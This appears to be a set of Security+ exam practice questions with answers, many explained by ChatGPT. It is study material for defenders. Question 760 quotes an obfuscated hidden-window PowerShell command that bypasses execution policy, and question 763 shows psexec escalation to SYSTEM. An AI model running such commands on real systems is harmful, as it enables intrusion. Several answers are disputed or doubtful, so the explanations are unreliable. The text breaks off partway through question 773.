SPIM (Spam over Internet Messaging) poses a threat to VoIP systems by consuming bandwidth, diverting resources, and potentially causing denial of service attacks. The influx of SPIM messages can degrade the quality of VoIP calls, overload servers, and serve as a platform for social engineering attacks, jeopardizing the security of VoIP users. To mitigate these risks, organizations should implement spam filters, intrusion detection systems, and regular software updates while also educating users to recognize and avoid potential threats associated with SPIM

Chat GPT
A. SPIM and C. VLAN hopping.

Here’s why:

SPIM (SPam over Internet Messaging) (option A) is the unsolicited sending of messages over VoIP systems, similar to email spam but affecting VoIP communications.

VLAN hopping (option C) is a technique where an attacker gains unauthorized access to network traffic between separate VLANs (Virtual Local Area Networks). It can potentially compromise VoIP traffic if VLANs are improperly configured, allowing attackers to intercept or manipulate VoIP data.

The other options do not typically relate directly to VoIP-associated vulnerabilities:

Vishing (option B) is a social engineering technique that involves phone calls to deceive individuals into providing sensitive information, but it is not specific to VoIP.

Phishing (option D) is another form of social engineering where attackers attempt to trick individuals into divulging sensitive information, often through fraudulent emails or websites, rather than VoIP systems.

DHCP snooping (option E) is a security feature that mitigates DHCP-related attacks by monitoring DHCP messages, which are not directly related to VoIP vulnerabilities.

Tailgating (option F) refers to physical security breaches where unauthorized individuals gain access to restricted areas by following authorized personnel, which does not directly involve VoIP vulnerabilities.

Therefore, A. SPIM and C. VLAN hopping are the common VoIP-associated vulnerabilities among the options provided.

749
Q

A security administrator received an alert for a user account with the following log activity:

Time IP Address AppDispalyName Location
5/23/22 10:07.16.301 AM 197.42.32.110 Shell_Client US
5/23/22 10:07.16.301 AM 197.42.32.110 Shell_Client US
5/23/22 10:07.16.301 AM 197.42.32.110 Shell_Client US
5/23/22 11:15.16.301 AM 210.167.76.13 Sign In Shell_Client AT

Which of the following best describes the trigger for the alert the administrator received?

A. Number of failed log-in attempts
B. Geolocation
C. Impossible travel time
D. Time-based log-in attempt

A

C. Impossible travel time
Explanation:

The log activity shows that a user account had log activity from two different IP addresses with a very short time difference:

At 10:07 AM, the user account logged in from IP address 197.42.32.110 (located in the US) multiple times.
Then, at 11:15 AM, there is a log-in attempt from IP address 210.167.76.13 (located in AT, likely Austria).

Given the short time interval between these log-in activities (less than an hour), it suggests that it would be impossible for the user to physically travel between the US and Austria within that timeframe. This discrepancy triggers the alert for impossible travel time, indicating a potential security concern such as account compromise or unauthorized access.

A. Number of failed log-in attempts is not correct because there is no indication of failed log-in attempts in the provided log.

B. Geolocation is related to the locations (US and AT) but doesn’t directly address the issue of the short time interval between log-ins from geographically distant locations.

D. Time-based log-in attempt is too general and doesn’t specifically address the issue of log-ins from different locations within an implausibly short timeframe.

Therefore, C. Impossible travel time is the best description of the trigger for the alert based on the provided log activity.

750
Q

Which of the following is a reason why a forensic specialist would create a plan to preserve data after an incident and prioritize the sequence for performing forensic analysis?

A. Order of volatility
B. Preservation of event logs
C. Chain of custody
D. Compliance with legal hold

A

A. Order of volatility

Here’s why:

Order of volatility refers to the principle in digital forensics that states volatile data should be collected and preserved first because it is more likely to change or be lost if not captured immediately. Volatile data includes information stored in memory (RAM), network connections, and system processes.

By creating a plan to preserve data based on the order of volatility, the forensic specialist ensures that critical evidence is captured before it is overwritten or lost. This helps maintain the integrity and completeness of the forensic investigation.

Let’s briefly cover the other options for clarity:

Preservation of event logs (option B) is important for maintaining a record of events that occurred on systems and networks, but it does not address the sequence or prioritization of data preservation and analysis in the same way as the order of volatility.

Chain of custody (option C) refers to the documentation and processes used to establish the chronological history of who has had control of digital evidence from the time of collection to its presentation in court. It is essential for maintaining the integrity and admissibility of evidence but is not directly related to the sequence for performing forensic analysis.

Compliance with legal hold (option D) refers to the requirement to preserve evidence related to litigation or investigations, ensuring that data is not altered or destroyed. While important for legal compliance, it does not dictate the sequence for performing forensic analysis based on the volatility of data.

Therefore, A. Order of volatility is the reason why a forensic specialist would create a plan to preserve data after an incident and prioritize the sequence for performing forensic analysis.

(Brain dump: B. Preservation of event logs)

751
Q

In which of the following scenarios is tokenization the best privacy technique to use?

A. Providing pseudo-anonymization for social media user accounts
B. Serving as a second factor for authentication requests
C. Enabling established customers to safely store credit card information
D. Masking personal information inside databases by segmenting data

A

C. Enabling established customers to safely store credit card information is the scenario where tokenization is the best privacy technique to use.

Here’s why:

Tokenization involves replacing sensitive data, such as credit card numbers, with a unique identifier (token) that has no exploitable value and can be used safely in place of the original data. The original sensitive data is stored securely in a tokenization system or vault.

In scenario C, enabling established customers to safely store credit card information, tokenization provides a secure method to store and process credit card data without exposing the actual card numbers to the organization's systems or databases.

Tokenization helps reduce the risk of data breaches because even if the tokenized data is intercepted, it cannot be used to derive the original credit card information without access to the tokenization system.

Let’s briefly consider the other options:

A. Providing pseudo-anonymization for social media user accounts typically involves anonymizing user data to protect identities but does not necessarily require tokenization.

B. Serving as a second factor for authentication requests relates to multi-factor authentication (MFA) where token-based authentication methods are used for security, but it does not involve tokenization of sensitive data like credit card information.

D. Masking personal information inside databases by segmenting data refers to data masking techniques to protect personal information within databases but is different from tokenization, which specifically addresses the secure storage of sensitive data like credit card numbers.

Therefore, C. Enabling established customers to safely store credit card information is the scenario where tokenization is the best privacy technique to use among the options provided.

752
Q

A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system. Which of the following would detect this behavior?

A. Implementing encryption
B. Monitoring outbound traffic
C. Using default settings
D. Closing all open ports

A

B. Monitoring outbound traffic

Here’s why:

Monitoring outbound traffic involves inspecting and analyzing data leaving a network or system. This approach can detect anomalies such as large or unusual volumes of data being transferred, connections to suspicious or unauthorized destinations, or patterns indicative of data exfiltration by malware.

Malware that allows unauthorized movement of data often attempts to send stolen information or communicate with command-and-control servers outside the organization. Monitoring outbound traffic allows security teams to detect and investigate such activities in real-time.

Let’s briefly discuss the other options:

Implementing encryption (option A) helps protect data confidentiality but does not directly detect unauthorized data movement caused by malware. Encryption prevents unauthorized access to data if properly implemented, but it does not provide detection capabilities for data exfiltration.

Using default settings (option C) is not related to detecting or mitigating data exfiltration caused by malware. Default settings typically refer to initial configurations of software or devices, which may need to be changed for security reasons but do not directly address malware behavior.

Closing all open ports (option D) is a security measure to limit exposure to external threats, but it does not specifically detect unauthorized data movement. Malware can utilize legitimate communication channels or exploit vulnerabilities regardless of open ports.

Therefore, B. Monitoring outbound traffic is the option that would best detect the behavior of unauthorized data movement caused by a new malware vulnerability.

753
Q

A systems administrator is auditing all company servers to ensure they meet the minimum security baseline. While auditing a Linux server, the systems administrator observes the /etc/shadow file has permissions beyond the baseline recommendation. Which of the following commands should the systems administrator use to resolve this issue?

A. chmod
B. grep
C. dd
D. passwd

A

A. chmod

754
Q

A security team received the following requirements for a new BYOD program that will allow employees to use personal smartphones to access business email:

Sensitive customer data must be safeguarded.
Documents from managed sources should not be opened in unmanaged destinations.
Sharing of managed documents must be disabled.
Employees should not be able to download emailed images to their devices.
Personal photos and contact lists must be kept private.
IT must be able to remove data from lost/stolen devices or when an employee no longer works for the company.

Which of the following are the best features to enable to meet these requirements? (Choose two.)

A. Remote wipe
B. VPN connection
C. Biometric authentication
D. Device location tracking
E. Geofencing
F. Application approve list
G. Containerization

A

A. Remote wipe and G. Containerization.

Here’s how these features address the specified requirements:

Remote wipe (Option A):
    Allows IT to remove data from lost/stolen devices or when an employee no longer works for the company.
    This feature ensures that sensitive customer data and company documents can be erased remotely to prevent unauthorized access in case of device loss or employee departure.

Containerization (Option G):
    Keeps managed documents and data separate from unmanaged areas.
    Disables sharing of managed documents.
    Prevents downloading of emailed images to personal device storage.
    Helps maintain privacy of personal photos and contact lists.

Containerization achieves these by creating separate secure containers on the device for business applications and data. It ensures that business documents and data are encrypted and isolated from personal apps and content. IT can control and enforce policies within the container without affecting the user's personal apps and data.

Let’s briefly review the other options for clarity:

VPN connection (Option B): While VPNs provide secure access to corporate resources over the internet, they do not inherently address the specific requirements related to data segregation, device management, or privacy control on personal devices.

Biometric authentication (Option C): Enhances device security but does not directly address data segregation or management on personal devices as required.

Device location tracking (Option D) and Geofencing (Option E): Provide capabilities for tracking and restricting device location, but these features do not directly meet the specific data segregation and management requirements for BYOD.

Application approve list (Option F): Involves allowing specific applications on devices but does not inherently ensure data segregation or control over document sharing and data privacy on personal devices.

Therefore, A. Remote wipe and G. Containerization are the best features to enable to meet the requirements of the new BYOD program for securely accessing business email while safeguarding sensitive data and ensuring privacy controls.

755
Q

Which of the following security controls is used to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of possible attacks?

A. Faraday cages
B. Air gap
C. Vaulting
D. Proximity readers

A

B. Air gap

Here’s why:

Air gap refers to physically isolating a system or network from other networks, particularly from the internet or other potentially insecure networks. This isolation is achieved by ensuring there are no network connections or data transfers between the air-gapped network and other networks.

By implementing an air gap, organizations can significantly reduce the attack surface because external threats, such as internet-based attacks, cannot directly access the isolated network. This isolation helps protect critical systems or sensitive data that require high levels of security.

Let’s briefly cover the other options for clarity:

Faraday cages (Option A) are physical enclosures that block electromagnetic signals, typically used to shield electronic devices from external electromagnetic interference. They are not directly related to network isolation for security purposes.

Vaulting (Option C) refers to securely storing physical items, such as data tapes or sensitive documents, in secure facilities or vaults. It is not specifically related to network isolation.

Proximity readers (Option D) are devices used for physical access control, allowing entry based on the proximity of an authorized credential (such as an access card or badge). They are used for controlling physical access to buildings or areas, not for network isolation.

Therefore, B. Air gap is the security control used to isolate a section of the network and its externally available resources from the internal corporate network to reduce the number of possible attacks.

756
Q

A security analyst is responding to a malware incident at a company. The malware connects to a command-and-control server on the internet in order to function. Which of the following should the security analyst implement first?

A. Network segmentation
B. IP-based firewall rules
C. Mobile device management
D. Content filler

A

B. IP-based firewall rules
(Community B 57%, A 40%)

Here’s why:

IP-based firewall rules can be quickly implemented to block communication between the infected systems and the known command-and-control server IP addresses.
This action helps to contain the malware and prevent further communication, limiting its ability to exfiltrate data or receive additional commands from the attacker.
Implementing IP-based firewall rules is a rapid and effective measure to disrupt the malware's operations without significant infrastructure changes or delays.

Let’s briefly discuss the other options for clarity:

Network segmentation (Option A) involves dividing a network into smaller segments to restrict the spread of malware and limit its impact. While important for long-term security, it typically requires more planning and implementation time compared to immediate firewall rule changes.

Mobile device management (Option C) is a system that manages mobile devices in the corporate environment, ensuring they adhere to security policies. However, it is not directly related to blocking communication between malware and a C&C server on the internet.

Content filter (Option D), also known as content filtering, is used to control what content users can access on the internet, but it does not address the immediate need to block specific communication channels used by malware.

Therefore, B. IP-based firewall rules is the most appropriate initial action for the security analyst to implement in response to the malware incident connecting to a command-and-control server on the internet.

757
Q

QUESTION: 757
A company wants to begin taking online orders for products but has decided to outsource payment processing to limit risk. Which of the following best describes what the company should request from the payment processor?

A. ISO 27001 certification documents
B. Proof of PCI DSS compliance
C. A third-party SOC 2 Type 2 report
D. Audited GDPR policies

A

B. Proof of PCI DSS compliance

Here’s why:

PCI DSS (Payment Card Industry Data Security Standard) compliance is specifically designed to protect cardholder data and ensure secure payment processing. This standard is mandated for all organizations that handle, process, store, or transmit credit card information.

By requesting proof of PCI DSS compliance, the company ensures that the payment processor adheres to the necessary security standards to protect sensitive payment information, thereby limiting the risk associated with handling and processing payments.

Let’s briefly discuss the other options for clarity:

ISO 27001 certification documents (Option A) pertain to a comprehensive information security management system (ISMS). While important for overall security posture, it is not specifically tailored to payment card processing security requirements like PCI DSS.

A third-party SOC 2 Type 2 report (Option C) evaluates the effectiveness of an organization’s controls relevant to security, availability, processing integrity, confidentiality, and privacy. Although useful for understanding a service provider’s security posture, it does not specifically address payment card industry requirements.

Audited GDPR policies (Option D) ensure compliance with the General Data Protection Regulation, which focuses on protecting personal data and privacy of individuals in the EU. While important for privacy considerations, GDPR compliance does not specifically address the security requirements for payment card processing.

Therefore, B. Proof of PCI DSS compliance is the best request to make to the payment processor to ensure secure and compliant handling of payment information for online orders.

758
Q

An employee in the accounting department receives an email containing a demand for
payment for services performed by a vendor. However, the vendor is not in the vendor
management database. Which of the following is this scenario an example of?

A. Pretexting
B. Impersonation
C. Ransomware
D. Invoice scam

A

D. Invoice scam

Here’s why:

An invoice scam involves sending fraudulent invoices to a company, hoping that the recipient will process the payment without verifying the legitimacy of the invoice. In this case, the employee receives a demand for payment for services from a vendor not listed in the vendor management database, indicating that the invoice is likely fraudulent.

Let’s briefly discuss the other options for clarity:

Pretexting (Option A) is a form of social engineering where an attacker creates a fabricated scenario (pretext) to trick the victim into divulging information or performing an action. While this scam could involve some form of pretexting, the scenario specifically matches an invoice scam.

Impersonation (Option B) involves an attacker pretending to be someone else, such as a trusted person or organization, to deceive the victim. While invoice scams can involve impersonation, the specific act of sending a fake invoice for payment is best described as an invoice scam.

Ransomware (Option C) is a type of malware that encrypts a victim’s data and demands a ransom payment to restore access. This scenario does not involve any form of malware or encryption, so it does not fit the description of ransomware.

Therefore, the scenario is best described as D. Invoice scam.

759
Q

A company has had several malware incidents that have been traced back to users
accessing personal SaaS applications on the internet from the company network. The
company has a policy that states users can only access business-related cloud applications from within the company network. Which of the following technical solutions should be used to enforce the policy?

A. Implement single sign-on using an identity provider
B. Leverage a cloud access security broker.
C. Configure cloud security groups
D. Install a virtual private cloud endpoint

A

B. Leverage a cloud access security broker.

Here’s why:

Cloud Access Security Brokers (CASBs) provide visibility and control over cloud applications and can enforce security policies for cloud usage. A CASB can monitor and manage the use of cloud applications, allowing the company to enforce policies that restrict access to only approved business-related applications. This includes blocking access to unauthorized personal SaaS applications.

Let’s briefly discuss the other options for clarity:

Implement single sign-on using an identity provider (Option A): While single sign-on (SSO) can simplify user authentication and provide better control over application access, it primarily addresses authentication and access management. SSO alone may not effectively enforce restrictions on accessing personal SaaS applications.

Configure cloud security groups (Option C): Security groups are typically used within cloud environments to control inbound and outbound traffic to resources. However, they do not provide the comprehensive visibility and policy enforcement needed to restrict user access to specific cloud applications from the company network.

Install a virtual private cloud endpoint (Option D): A virtual private cloud (VPC) endpoint allows secure connection to cloud services without traversing the internet, but it does not provide the necessary functionality to enforce application-specific access policies.

Therefore, B. Leverage a cloud access security broker is the most appropriate technical solution to enforce the policy and prevent users from accessing personal SaaS applications on the internet from the company network.

760
Q

A security analyst is reviewing an IDS alert and sees the following:
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -exe byPass -nonI -wind hidden -no1 -c dir;findstr /s maldinuv %USERPROFILE%\*.lnk >
%USERPROFILE%\Documents\iijlqe.ps1;%USERPROFILE%\Documents\iijlqe.psi;exit
Which of the following triggered the IDS alert?

A. Bluesnarfing attack
B. URL redirection attack
C. Fileless malware execution
D. Macro-based denial of service

A

C. Fileless malware execution

Here’s why:

The command shown in the alert involves PowerShell, which is a common tool used in fileless malware attacks. Fileless malware does not rely on traditional files stored on the disk but instead runs in memory, often leveraging legitimate system tools like PowerShell to execute malicious activities.

The command includes parameters such as -noP, -exe byPass, -nonI, -wind hidden, which are used to run PowerShell scripts with minimal visibility and bypass execution policies, indicating malicious intent.

The command also involves searching for and interacting with files (findstr /s maldinuv %USERPROFILE%\*.lnk > %USERPROFILE%\Documents\iijlqe.ps1), which is consistent with fileless malware behaviors that often involve scripting and in-memory execution.

Let’s briefly discuss why the other options are not correct:

Bluesnarfing attack (Option A): Bluesnarfing involves unauthorized access to a device via Bluetooth, which is unrelated to the PowerShell command shown.

URL redirection attack (Option B): URL redirection attacks involve redirecting users to malicious websites, which is not indicated by the PowerShell command provided.

Macro-based denial of service (Option D): This refers to using macros in documents (such as those in Microsoft Office) to execute malicious code and cause a denial of service. The command shown does not involve macros or suggest a denial of service attack.

Therefore, the alert was triggered by C. Fileless malware execution.

761
Q

A company wants to implement MFA. Which of the following enables the additional factor while using a smart card?

A. PIN
B. Hardware token
C. User ID
D. SMS

A

A. PIN

Here’s why:

PIN (Personal Identification Number): When using a smart card, a PIN is often required to authenticate the user and unlock the smart card. This combination of something the user has (the smart card) and something the user knows (the PIN) constitutes two-factor authentication (2FA).

Let’s briefly discuss why the other options are not correct in this context:

Hardware token (Option B): While a hardware token is another form of MFA, it is a separate physical device and is not typically used in conjunction with a smart card for a single authentication process.

User ID (Option C): A user ID is used to identify the user but does not serve as an authentication factor by itself. It is typically used alongside other authentication factors like passwords, PINs, or smart cards.

SMS (Option D): SMS-based authentication involves sending a code to the user’s phone, which can be used as a second factor in MFA. However, it is not directly related to the use of a smart card.

Therefore, A. PIN is the correct answer as it enables the additional factor of authentication when using a smart card.

762
Q

A server administrator is reporting performance issues when accessing all internal resources. Upon further investigation, the security team notices the following:

  • A user’s endpoint has been compromised and is broadcasting its MAC as the default gateway’s MAC throughout the LAN.
  • Traffic to and from that endpoint is significantly greater than all other similar endpoints on the LAN.
  • Network ports on the LAN are not properly configured.
  • Wired traffic is not being encrypted properly.

Which of the following attacks is most likely occurring?
A. DDoS
B. MAC flooding
C. ARP poisoning
D. DHCP snooping

A

C. ARP poisoning

Here’s why:

ARP poisoning (also known as ARP spoofing) involves an attacker sending falsified ARP (Address Resolution Protocol) messages over a local area network. This results in linking the attacker’s MAC address with the IP address of a legitimate computer or network gateway. In this scenario, the compromised endpoint is broadcasting its MAC address as the default gateway's MAC, which is a classic sign of ARP poisoning.

The significant traffic to and from the compromised endpoint suggests it is intercepting and possibly manipulating or eavesdropping on network traffic, which is common in ARP poisoning attacks.

The improper configuration of network ports and lack of encrypted wired traffic further exacerbate the vulnerability to ARP poisoning.

Let’s briefly discuss why the other options are not correct:

DDoS (Distributed Denial of Service) (Option A): This type of attack involves overwhelming a target with traffic from multiple sources to disrupt service. The scenario does not describe multiple sources of traffic targeting a single endpoint.

MAC flooding (Option B): This attack involves overwhelming a switch with fake MAC addresses to fill its CAM table and cause it to operate in broadcast mode. While this could lead to performance issues, it does not align with the specific behavior of broadcasting the default gateway’s MAC address.

DHCP snooping (Option D): This is a security feature that acts as a firewall between untrusted hosts and DHCP servers to prevent rogue DHCP server attacks. It does not align with the symptoms described in the scenario, such as broadcasting a MAC address.

Therefore, the most likely attack occurring is C. ARP poisoning.

763
Q

A security analyst is reviewing the following system command history on a computer that was recently utilized in a larger attack on the corporate infrastructure:

C:\sysadmin > whoami
domain\localuser

C:\sysadmin> psexec.exe -s cmd
PsExec v2.0 - Execute processes remotely
Microsoft Windows [Version 10]

C:\Windows\system32>whoami
nt authority\system

Which of the following best describes what the analyst has discovered?

A. A successful privilege escalation attack by a local user
B. A user determining what level of permissions the user has
C. A systems administrator performing routine maintenance
D. An attempt to utilize living-off-the-land binaries

A

A. A successful privilege escalation attack by a local user

Here’s why:

The command history shows the initial user identity as domain\localuser, indicating the commands are being run by a standard user.
The user then runs psexec.exe -s cmd, which is a command to run the cmd process with the highest possible privileges (the -s switch runs the command in the System account context).
After this command, the whoami command returns nt authority\system, indicating the user has successfully escalated privileges to the highest level available on the system.

This sequence of commands strongly suggests that a local user has performed a privilege escalation attack to gain higher-level privileges on the system.

Let’s briefly discuss why the other options are not correct:

B. A user determining what level of permissions the user has: While the whoami command does determine the current user's permissions, the key detail here is the use of psexec.exe to escalate privileges, which goes beyond just checking permissions.

C. A systems administrator performing routine maintenance: While a system administrator might perform such actions, the initial identity (domain\localuser) does not match that of a typical system administrator, and the context implies unauthorized privilege escalation.

D. An attempt to utilize living-off-the-land binaries: While psexec.exe is indeed a living-off-the-land binary (a legitimate tool used for malicious purposes), the specific actions in this scenario best fit the definition of a privilege escalation attack.

Therefore, the most accurate description is A. A successful privilege escalation attack by a local user.

764
Q

During a forensic investigation, an analyst uses software to create a checksum of the affected subject’s email file. Which of the following is the analyst practicing?

A. Chain of custody
B. Data recovery
C. Non-repudiation
D. Integrity

A

D. Integrity

Here’s why:

Creating a checksum: The process of generating a checksum (or hash) for a file is a method used to ensure the integrity of the data. A checksum is a unique value derived from the contents of the file. If the file is altered in any way, the checksum will change. This allows the analyst to verify that the email file has not been tampered with during the investigation.

Let’s briefly discuss why the other options are not correct:

Chain of custody (Option A): This refers to the documentation and handling process that tracks the evidence from the time it is collected until it is presented in court. While maintaining integrity is part of the chain of custody, creating a checksum specifically addresses data integrity rather than the overall tracking process.

Data recovery (Option B): This involves restoring lost, corrupted, or deleted data. Creating a checksum does not recover data but rather ensures the data remains unaltered.

Non-repudiation (Option C): This ensures that a party cannot deny the authenticity of their signature on a document or the sending of a message that they originated. While checksums can contribute to non-repudiation, the primary purpose of creating a checksum in this context is to verify data integrity.

Therefore, D. Integrity is the most appropriate answer.

765
Q

A software company has a shared codebase for multiple projects using the following strategy:

  • Unused features are deactivated but still present on the code.
  • New customer requirements trigger additional development work.

Which of the following will most likely occur when the company uses this strategy?

A. Malicious code
B. Dead code
C. Outsourced code
D. Code obfuscation

A

B. Dead code

Here’s why:

Dead code: This refers to portions of the codebase that are no longer used or needed but still exist in the system. In this case, since unused features are deactivated but not removed from the code, they become dead code. This can lead to increased maintenance efforts and potential security vulnerabilities, but it doesn't necessarily imply immediate malicious intent.

Let’s briefly discuss why the other options are not correct:

Malicious code (Option A): Malicious code refers to software intentionally designed to cause harm, such as viruses or malware. The strategy described does not inherently suggest the presence or introduction of malicious code.

Outsourced code (Option C): This refers to code developed by an external party. The strategy mentioned does not indicate the use of external developers or third-party code.

Code obfuscation (Option D): This is the practice of making code difficult to understand on purpose to protect intellectual property or hinder reverse engineering. The described strategy does not involve making the code intentionally obscure.

Therefore, the most likely occurrence is B. Dead code.

766
Q

A security audit of an organization revealed that most of the IT staff members have domain administrator credentials and do not change the passwords regularly. Which of the following solutions should the security team propose to resolve the findings in the most complete way?

A. Creating group policies to enforce password rotation on domain administrator credentials
B. Reviewing the domain administrator group, removing all unnecessary administrators, and rotating all passwords
C. Integrating the domain administrator’s group with an IdP and requiring SSO with MFA for all access
D. Securing domain administrator credentials in a PAM vault and controlling access with
role-based access control

A

(Brain dump : B. Reviewing the domain administrator group, removing all unnecessary administrators, and rotating all passwords )

(Community : B 51%, D 49%)
It’s B. since the question said that “most of the IT staff members have domain administrator credentials and do not change the passwords regularly”. It probably means that there has not been an auditing to limit the access control and also passwords needs to be changed regularly. so. Option B fits perfect!

ChatGPT
D. Securing domain administrator credentials in a PAM vault and controlling access with role-based access control

Here’s why:

Privileged Access Management (PAM) vault: A PAM solution provides a secure vault for storing and managing privileged credentials. It can enforce policies for password rotation, ensuring that passwords are changed regularly and automatically.

Role-based access control (RBAC): By implementing RBAC, the organization can ensure that only authorized personnel have access to domain administrator credentials, reducing the number of people with such high-level access.

Audit and control: A PAM system can also provide detailed auditing and monitoring of all actions performed with privileged accounts, increasing security and accountability.

While the other options address some aspects of the issue, they do not provide a comprehensive solution:

Option A (Creating group policies to enforce password rotation): This is a good step for enforcing regular password changes, but it doesn't address the broader issue of excessive domain administrator access.

Option B (Reviewing the domain administrator group and rotating passwords): This addresses the immediate issue but does not provide an ongoing mechanism for managing and securing credentials.

Option C (Integrating with an IdP and requiring SSO with MFA): This enhances security through SSO and MFA but does not specifically address the management and rotation of domain administrator credentials.

Therefore, the most complete solution is D. Securing domain administrator credentials in a PAM vault and controlling access with role-based access control.

767
Q

Which of the following best describes a threat actor who is attempting to use commands found on a public code repository?

A. Script kiddie
B. State actor
C. Insider threat
D. Competitor espionage

A

A. Script kiddie

Here’s why:

Script kiddie: This term refers to individuals who lack deep technical understanding but attempt to exploit vulnerabilities using pre-existing tools or scripts developed by others. They often rely on easily accessible resources like public code repositories to carry out attacks without fully understanding the underlying mechanisms or coding involved.

In contrast, the other options are less suitable:

State actor (Option B): State actors are typically government-sponsored or affiliated entities conducting cyber operations for strategic or political purposes. They would generally have more sophisticated capabilities and resources than those typically associated with script kiddies.

Insider threat (Option C): An insider threat involves an individual within an organization who poses a risk, either intentionally or unintentionally. It doesn't specifically relate to using commands from public code repositories.

Competitor espionage (Option D): This involves malicious activities aimed at gaining competitive advantage through unauthorized access or information theft, which doesn't directly correlate with using public code repositories.

Therefore, the most appropriate term for a threat actor using commands from a public code repository is A. Script kiddie.

768
Q

While assessing the security of a web application, a security analyst was able to introduce unsecure strings through the application input fields by bypassing client-side controls. Which of the following solutions should the analyst recommend?

A. Code signing
B. Host-based intrusion detection system
C. Secure cookies
D. Server-side validation

A

D. Server-side validation

Here’s why:

Server-side validation: This involves validating input data on the server-side rather than relying solely on client-side validation. Client-side controls can be bypassed or manipulated by attackers, whereas server-side validation ensures that input data is validated and sanitized before processing. This helps prevent injection attacks, such as SQL injection or cross-site scripting (XSS), which can occur when malicious strings are passed through input fields.

Let’s briefly discuss why the other options are not suitable:

Code signing (Option A): Code signing is used to verify the authenticity and integrity of software. It does not address the issue of input validation for web applications.

Host-based intrusion detection system (Option B): An intrusion detection system monitors and analyzes network traffic for signs of unauthorized access or malicious activities. While important for overall security, it does not directly address input validation issues in web applications.

Secure cookies (Option C): Secure cookies are used to enhance the security of data transmitted between the client and server, but they do not address the issue of input validation. They are more focused on ensuring data confidentiality and integrity during transmission.

Therefore, to mitigate the risk of introducing unsecure strings through input fields, the most appropriate solution is D. Server-side validation. This ensures that all input data is properly validated and sanitized on the server before any further processing occurs.

769
Q

A vulnerability scan returned the following results:
* 2 Critical
* 5 High
* 15 Medium
* 98 Low

Which of the following would the information security team most likely use to decide if all discovered vulnerabilities must be addressed and the order in which they should be
addressed?

A. Risk appetite
B. Risk register
C. Risk matrix
D. Risk acceptance

A

C. Risk Matrix

Here’s why:

Risk Matrix: A risk matrix categorizes risks based on their likelihood and impact. Vulnerabilities are typically assessed based on their severity (critical, high, medium, low) and the potential impact they could have on the organization if exploited. By using a risk matrix, the team can prioritize vulnerabilities for remediation based on their risk level, helping them decide which vulnerabilities need immediate attention and which ones can be addressed later.

Let’s briefly discuss why the other options are not as suitable:

Risk appetite (Option A): Risk appetite refers to the level of risk an organization is willing to accept. While it guides decisions on whether to accept, mitigate, or transfer risks, it does not directly determine the order of addressing vulnerabilities based on their severity.

Risk register (Option B): A risk register is a document used to record information about identified risks, including their description, likelihood, impact, and mitigation plans. While it provides a repository of risks, it does not inherently prioritize vulnerabilities based on severity.

Risk acceptance (Option D): Risk acceptance is the decision to accept the potential risk associated with a vulnerability without taking any further action. It is a decision made after assessing the risk, but it does not guide the prioritization of vulnerabilities.

Therefore, the Risk Matrix (Option C) is the tool that the information security team would most likely use to decide if all discovered vulnerabilities must be addressed and the order in which they should be addressed, based on their severity and potential impact.

770
Q

A company wants to ensure that all employees in a given department are trained on each job role to help with employee burnout and continuity of business operations in the event an employee leaves the company. Which of the following should the company implement?

A. Separation of duties
B. Job rotation
C. Mandatory vacations
D. Least privilege

A

B. Job rotation

Here’s why job rotation is the most suitable option:

Job rotation: This practice involves periodically rotating employees through different job roles within the department or organization. By rotating job roles, employees gain experience and proficiency in different tasks, reducing the risk of burnout from repetitive tasks. Additionally, it ensures that multiple employees are trained to handle various job responsibilities, thereby enhancing continuity of operations in case of employee turnover.

Let’s briefly discuss why the other options are less suitable:

Separation of duties (Option A): This principle aims to prevent fraud and errors by dividing responsibilities among different employees. While important for internal controls and security, it does not directly address employee burnout or continuity of operations in the same way as job rotation.

Mandatory vacations (Option C): While mandatory vacations can help prevent burnout and provide temporary coverage during absence, they do not ensure ongoing training across job roles as effectively as job rotation.

Least privilege (Option D): This principle limits access rights and permissions to the minimum necessary for employees to perform their job functions securely. While crucial for security, it does not directly address the need for cross-training and job role versatility.

Therefore, B. Job rotation is the best option to help with employee burnout and ensure continuity of business operations by ensuring that employees are trained in multiple job roles within the department.

771
Q

Various stakeholders are meeting to discuss their hypothetical roles and responsibilities in a specific situation, such as a security incident or major disaster. Which of the following best describes this meeting?

A. Penetration test
B. Continuity of operations planning
C. Tabletop exercise
D. Simulation

A

C. Tabletop exercise

Here’s why:

Tabletop exercise: This is a structured, discussion-based session where stakeholders gather to walk through a hypothetical scenario. The scenario typically involves a simulated incident or disaster to test and validate an organization's incident response plans, business continuity plans, or disaster recovery plans. Participants discuss their roles and responsibilities, identify gaps in procedures, and refine response strategies in a controlled environment.

Penetration test (Option A): This involves actively testing the security of systems and networks by simulating attacks to identify vulnerabilities that could be exploited by real attackers. It focuses on technical testing rather than discussing roles and responsibilities in a scenario.

Continuity of operations planning (Option B): This refers to the process of developing and implementing plans and procedures to ensure that essential functions can continue during and after a disaster or disruption. While related to business resilience, it does not specifically involve stakeholders discussing their roles in a simulated scenario.

Simulation (Option D): Simulations involve recreating real-world scenarios to understand the effects of certain decisions or actions. It can be broader in scope than a tabletop exercise and may involve more operational aspects rather than focusing specifically on roles and responsibilities.

Therefore, the meeting where stakeholders discuss their hypothetical roles and responsibilities in a specific scenario is most appropriately referred to as a tabletop exercise.

772
Q

Which of the following threat actors is most likely to use a high level of sophistication and potentially zero-day exploits to target organizations and systems?

A. APT groups
B. Script kiddies
C. Hacktivists
D. Ethical hackers

A

A. APT groups

Here’s why:

APT (Advanced Persistent Threat) groups: APT groups are typically well-funded and highly skilled adversaries, often state-sponsored or affiliated with nation-states. They employ sophisticated techniques, including zero-day exploits (exploits for vulnerabilities that are unknown to the software vendor), to infiltrate and compromise targeted organizations. APT groups are known for their persistence, stealth, and ability to conduct long-term, covert operations aimed at stealing sensitive information, disrupting operations, or achieving strategic objectives.

Script kiddies (Option B): Script kiddies lack technical expertise and rely on pre-existing tools or scripts developed by others to carry out attacks. They do not typically use sophisticated techniques or zero-day exploits.

Hacktivists (Option C): Hacktivists engage in hacking activities for political or social causes. While they may target organizations, they often use less sophisticated methods compared to APT groups and are more focused on making a public statement rather than maintaining stealth.

Ethical hackers (Option D): Ethical hackers, also known as white-hat hackers, use their skills to identify and fix security vulnerabilities in systems with the permission of the organization. They do not engage in malicious activities and do not use zero-day exploits unless authorized as part of their testing.

Therefore, APT groups (Option A) are the threat actors most likely to use a high level of sophistication and potentially zero-day exploits to target organizations and systems.

773
Q

A company is implementing a vendor’s security tool in the cloud. The security director does not want to manage users and passwords specific to this tool but would rather utilize the company’s standard user directory. Which of the following should the company implement?

A. 802.1X
B. SAML
